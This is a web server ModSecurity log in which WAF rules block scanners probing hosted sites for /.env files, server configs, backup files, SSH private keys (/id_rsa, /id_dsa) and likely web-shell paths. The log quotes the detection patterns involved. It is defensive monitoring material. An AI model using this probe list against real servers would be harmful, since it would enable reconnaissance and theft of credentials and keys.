[Tue May 26 13:10:54.959561 2026] [security2:error] [pid 496740:tid 496944] [client 172.202.92.73:59923] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/k.php"] [unique_id "ahVOhuvOeft4ltnLrH4pMgAAAEo"]
[Tue May 26 13:10:54.959689 2026] [security2:error] [pid 496740:tid 496944] [client 172.202.92.73:59923] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/k.php"] [unique_id "ahVOhuvOeft4ltnLrH4pMgAAAEo"]
[Tue May 26 13:10:56.295225 2026] [security2:error] [pid 496740:tid 496924] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOh-vOeft4ltnLrH4pXAAAADY"]
[Tue May 26 13:10:58.140478 2026] [security2:error] [pid 496740:tid 496886] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOievOeft4ltnLrH4prQAAABA"]
[Tue May 26 13:11:00.557356 2026] [security2:error] [pid 496740:tid 496972] [client 172.202.92.73:48373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/o.php"] [unique_id "ahVOjOvOeft4ltnLrH4qKgAAAGY"]
[Tue May 26 13:11:00.557460 2026] [security2:error] [pid 496740:tid 496972] [client 172.202.92.73:48373] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/o.php"] [unique_id "ahVOjOvOeft4ltnLrH4qKgAAAGY"]
[Tue May 26 13:11:01.443749 2026] [security2:error] [pid 496740:tid 496970] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOjevOeft4ltnLrH4qQQAAAGQ"]
[Tue May 26 13:11:02.882205 2026] [security2:error] [pid 496740:tid 496783] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.htaccess.orig"] [unique_id "ahVOjuvOeft4ltnLrH4qhQAAQSo"]
[Tue May 26 13:11:03.638942 2026] [security2:error] [pid 496740:tid 496817] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "httpd.conf"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/httpd.conf"] [unique_id "ahVOj-vOeft4ltnLrH4qrwAAMUw"]
[Tue May 26 13:11:03.864712 2026] [security2:error] [pid 496740:tid 496897] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOj-vOeft4ltnLrH4qnwAAABs"]
[Tue May 26 13:11:04.062042 2026] [security2:error] [pid 496740:tid 496994] [client 172.202.92.73:55716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/bb.php"] [unique_id "ahVOkOvOeft4ltnLrH4qyAAAAHw"]
[Tue May 26 13:11:04.062152 2026] [security2:error] [pid 496740:tid 496994] [client 172.202.92.73:55716] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/bb.php"] [unique_id "ahVOkOvOeft4ltnLrH4qyAAAAHw"]
[Tue May 26 13:11:05.133274 2026] [security2:error] [pid 496740:tid 496970] [client 176.65.139.233:25942] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.strapptech.com.thedebateafrica.org"] [uri "/.env"] [unique_id "ahVOkevOeft4ltnLrH4rAQAAAGQ"]
[Tue May 26 13:11:05.405919 2026] [security2:error] [pid 496740:tid 496978] [client 71.6.146.185:50394] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "162.222.227.191"] [uri "/cgi-sys/404.html"] [unique_id "ahVOkevOeft4ltnLrH4rFAAAAGw"]
[Tue May 26 13:11:05.747510 2026] [security2:error] [pid 496740:tid 496966] [client 172.202.92.73:55211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/rip.php"] [unique_id "ahVOkevOeft4ltnLrH4rKAAAAGA"]
[Tue May 26 13:11:05.747617 2026] [security2:error] [pid 496740:tid 496966] [client 172.202.92.73:55211] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/rip.php"] [unique_id "ahVOkevOeft4ltnLrH4rKAAAAGA"]
[Tue May 26 13:11:05.752191 2026] [security2:error] [pid 496740:tid 496954] [client 71.6.146.185:50570] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "162.222.227.191"] [uri "/cgi-sys/404.html"] [unique_id "ahVOkevOeft4ltnLrH4rKQAAAFQ"]
[Tue May 26 13:11:05.768240 2026] [security2:error] [pid 496740:tid 496979] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOkevOeft4ltnLrH4rEQAAAG0"]
[Tue May 26 13:11:06.315128 2026] [security2:error] [pid 496740:tid 496746] [remote 149.102.129.214:41286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.129.102.149.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVOkuvOeft4ltnLrH4rPQAAAAU"]
[Tue May 26 13:11:07.373412 2026] [security2:error] [pid 496740:tid 496995] [client 172.202.92.73:58970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.azurmediatec.com"] [uri "/s.php"] [unique_id "ahVOk-vOeft4ltnLrH4rfQAAAH0"]
[Tue May 26 13:11:07.373561 2026] [security2:error] [pid 496740:tid 496995] [client 172.202.92.73:58970] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.azurmediatec.com"] [uri "/s.php"] [unique_id "ahVOk-vOeft4ltnLrH4rfQAAAH0"]
[Tue May 26 13:11:07.864754 2026] [security2:error] [pid 496740:tid 496989] [client 71.6.146.185:51222] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "162.222.227.191"] [uri "/cgi-sys/404.html"] [unique_id "ahVOk-vOeft4ltnLrH4rlAAAAHc"]
[Tue May 26 13:11:08.036859 2026] [security2:error] [pid 496740:tid 496959] [client 185.191.171.15:32928] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVOlOvOeft4ltnLrH4rnAAAAFk"]
[Tue May 26 13:11:08.036985 2026] [security2:error] [pid 496740:tid 496959] [client 185.191.171.15:32928] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVOlOvOeft4ltnLrH4rnAAAAFk"]
[Tue May 26 13:11:08.231596 2026] [security2:error] [pid 496740:tid 496909] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOk-vOeft4ltnLrH4rkAAAACc"]
[Tue May 26 13:11:10.402278 2026] [security2:error] [pid 496740:tid 496769] [remote 74.7.241.58:32882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVOluvOeft4ltnLrH4r9AAAEhw"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/lib
[Tue May 26 13:11:10.779066 2026] [security2:error] [pid 496740:tid 496953] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOluvOeft4ltnLrH4r9wAAAFM"]
[Tue May 26 13:11:13.889368 2026] [security2:error] [pid 496740:tid 496910] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOmevOeft4ltnLrH4scQAAACg"]
[Tue May 26 13:11:16.437752 2026] [security2:error] [pid 496740:tid 496975] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOnOvOeft4ltnLrH4s0QAAAGk"]
[Tue May 26 13:11:17.089249 2026] [security2:error] [pid 496740:tid 496979] [client 187.19.26.155:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOnOvOeft4ltnLrH4s9QAAAG0"]
[Tue May 26 13:11:18.215465 2026] [security2:error] [pid 496740:tid 496976] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOnevOeft4ltnLrH4tMgAAAGo"]
[Tue May 26 13:11:20.648289 2026] [security2:error] [pid 496740:tid 496797] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/id_rsa"] [unique_id "ahVOoOvOeft4ltnLrH4t2wAATjg"]
[Tue May 26 13:11:20.746088 2026] [security2:error] [pid 496740:tid 496896] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOoOvOeft4ltnLrH4tzwAAABo"]
[Tue May 26 13:11:21.009696 2026] [security2:error] [pid 496740:tid 496790] [remote 185.177.72.30:64016] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/id_dsa"] [unique_id "ahVOoevOeft4ltnLrH4t6gAARjE"]
[Tue May 26 13:11:21.112226 2026] [authz_core:error] [pid 496740:tid 496953] [client 176.65.139.236:47896] AH01630: client denied by server configuration: /home2/azurm42s/public_html/erptrn.azurmediatec.com/.env
[Tue May 26 13:11:23.886640 2026] [security2:error] [pid 496740:tid 496888] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOo-vOeft4ltnLrH4ubAAAABI"]
[Tue May 26 13:11:25.844795 2026] [security2:error] [pid 496740:tid 496995] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOpevOeft4ltnLrH4uuwAAAH0"]
[Tue May 26 13:11:26.227646 2026] [security2:error] [pid 496740:tid 496929] [client 20.151.117.104:59286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVOpuvOeft4ltnLrH4u2QAAADs"]
[Tue May 26 13:11:26.227774 2026] [security2:error] [pid 496740:tid 496929] [client 20.151.117.104:59286] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVOpuvOeft4ltnLrH4u2QAAADs"]
[Tue May 26 13:11:26.377862 2026] [security2:error] [pid 496740:tid 496876] [client 20.151.117.104:37153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/rip.php"] [unique_id "ahVOpuvOeft4ltnLrH4u6AAAAAY"]
[Tue May 26 13:11:26.378054 2026] [security2:error] [pid 496740:tid 496876] [client 20.151.117.104:37153] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/rip.php"] [unique_id "ahVOpuvOeft4ltnLrH4u6AAAAAY"]
[Tue May 26 13:11:26.521859 2026] [security2:error] [pid 496740:tid 496885] [client 20.151.117.104:6716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/archive.php"] [unique_id "ahVOpuvOeft4ltnLrH4u8AAAAA8"]
[Tue May 26 13:11:26.522024 2026] [security2:error] [pid 496740:tid 496885] [client 20.151.117.104:6716] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/archive.php"] [unique_id "ahVOpuvOeft4ltnLrH4u8AAAAA8"]
[Tue May 26 13:11:26.664681 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:42075] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/66.php"] [unique_id "ahVOpuvOeft4ltnLrH4u9QAAAC0"]
[Tue May 26 13:11:26.664803 2026] [security2:error] [pid 496740:tid 496915] [client 20.151.117.104:42075] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/66.php"] [unique_id "ahVOpuvOeft4ltnLrH4u9QAAAC0"]
[Tue May 26 13:11:26.806942 2026] [security2:error] [pid 496740:tid 496914] [client 20.151.117.104:27701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ioxi-o.php"] [unique_id "ahVOpuvOeft4ltnLrH4u_wAAACw"]
[Tue May 26 13:11:26.807046 2026] [security2:error] [pid 496740:tid 496914] [client 20.151.117.104:27701] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ioxi-o.php"] [unique_id "ahVOpuvOeft4ltnLrH4u_wAAACw"]
[Tue May 26 13:11:26.955671 2026] [security2:error] [pid 496740:tid 496995] [client 20.151.117.104:40674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ms-edit.php"] [unique_id "ahVOpuvOeft4ltnLrH4vAgAAAH0"]
[Tue May 26 13:11:26.955776 2026] [security2:error] [pid 496740:tid 496995] [client 20.151.117.104:40674] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ms-edit.php"] [unique_id "ahVOpuvOeft4ltnLrH4vAgAAAH0"]
[Tue May 26 13:11:27.077171 2026] [security2:error] [pid 496740:tid 496951] [client 49.13.130.29:15004] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVOp-vOeft4ltnLrH4vBgAAAFE"], referer: https://thegoodsporting.com
[Tue May 26 13:11:27.098699 2026] [security2:error] [pid 496740:tid 496877] [client 20.151.117.104:14314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVOp-vOeft4ltnLrH4vCgAAAAc"]
[Tue May 26 13:11:27.098811 2026] [security2:error] [pid 496740:tid 496877] [client 20.151.117.104:14314] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVOp-vOeft4ltnLrH4vCgAAAAc"]
[Tue May 26 13:11:27.247952 2026] [security2:error] [pid 496740:tid 496985] [client 20.151.117.104:28881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/404.php"] [unique_id "ahVOp-vOeft4ltnLrH4vFAAAAHM"]
[Tue May 26 13:11:27.248065 2026] [security2:error] [pid 496740:tid 496985] [client 20.151.117.104:28881] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/404.php"] [unique_id "ahVOp-vOeft4ltnLrH4vFAAAAHM"]
[Tue May 26 13:11:27.395666 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:42053] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/file3.php"] [unique_id "ahVOp-vOeft4ltnLrH4vGwAAAFQ"]
[Tue May 26 13:11:27.395760 2026] [security2:error] [pid 496740:tid 496954] [client 20.151.117.104:42053] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/file3.php"] [unique_id "ahVOp-vOeft4ltnLrH4vGwAAAFQ"]
[Tue May 26 13:11:27.537717 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:14287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-mail.php"] [unique_id "ahVOp-vOeft4ltnLrH4vJQAAADg"]
[Tue May 26 13:11:27.537824 2026] [security2:error] [pid 496740:tid 496926] [client 20.151.117.104:14287] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-mail.php"] [unique_id "ahVOp-vOeft4ltnLrH4vJQAAADg"]
[Tue May 26 13:11:27.688749 2026] [security2:error] [pid 496740:tid 496972] [client 20.151.117.104:6675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/byp.php"] [unique_id "ahVOp-vOeft4ltnLrH4vKQAAAGY"]
[Tue May 26 13:11:27.688865 2026] [security2:error] [pid 496740:tid 496972] [client 20.151.117.104:6675] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/byp.php"] [unique_id "ahVOp-vOeft4ltnLrH4vKQAAAGY"]
[Tue May 26 13:11:27.831114 2026] [security2:error] [pid 496740:tid 496986] [client 20.151.117.104:35549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/index.php"] [unique_id "ahVOp-vOeft4ltnLrH4vMwAAAHQ"]
[Tue May 26 13:11:27.831210 2026] [security2:error] [pid 496740:tid 496986] [client 20.151.117.104:35549] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/index.php"] [unique_id "ahVOp-vOeft4ltnLrH4vMwAAAHQ"]
